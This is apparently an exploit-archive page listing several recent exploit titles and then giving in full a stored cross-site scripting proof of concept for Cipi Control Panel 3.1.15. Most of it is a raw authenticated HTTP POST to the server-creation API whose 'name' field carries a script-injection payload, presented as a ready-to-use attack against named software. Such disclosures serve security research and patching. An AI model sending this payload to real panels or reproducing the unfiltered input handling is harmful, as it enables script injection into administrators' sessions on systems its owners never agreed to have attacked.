bba496461e
6 changes to exploits/shellcodes Cobian Reflector 0.9.93 RC1 - 'Password' Denial of Service (PoC) Cobian Backup 11 Gravity 11.2.0.582 - 'Password' Denial of Service (PoC) Cobian Backup Gravity 11.2.0.582 - 'CobianBackup11' Unquoted Service Path WAGO 750-8212 PFC200 G2 2ETH RS - Privilege Escalation Cipi Control Panel 3.1.15 - Stored Cross-Site Scripting (XSS) (Authenticated) Casdoor 1.13.0 - SQL Injection (Unauthenticated)
32 lines
No EOL
960 B
Text
32 lines
No EOL
960 B
Text
# Exploit Title: Cipi Control Panel 3.1.15 - Stored Cross-Site Scripting (XSS) (Authenticated)
|
|
# Date: 24.02.2022
|
|
# Exploit Author: Fikrat Ghuliev (Ghuliev)
|
|
# Vendor Homepage: https://cipi.sh/ <https://www.aapanel.com/>
|
|
# Software Link: https://cipi.sh/ <https://www.aapanel.com/>
|
|
# Version: 3.1.15
|
|
# Tested on: Ubuntu
|
|
|
|
When the user wants to add a new server on the "Server" panel, in "name"
|
|
parameter has not had any filtration.
|
|
|
|
POST /api/servers HTTP/1.1
|
|
Host: IP
|
|
Content-Length: 102
|
|
Accept: application/json
|
|
X-Requested-With: XMLHttpRequest
|
|
Authorization: Bearer
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
|
|
(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
|
|
Content-Type: application/json
|
|
Origin: http://IP
|
|
Referer: http://IP/servers
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: en-US,en;q=0.9
|
|
Connection: close
|
|
|
|
{
|
|
"name":"\"><script>alert(1337)</script>",
|
|
"ip":"10.10.10.10",
|
|
"provider":"local",
|
|
"location":"xss test"
|
|
} |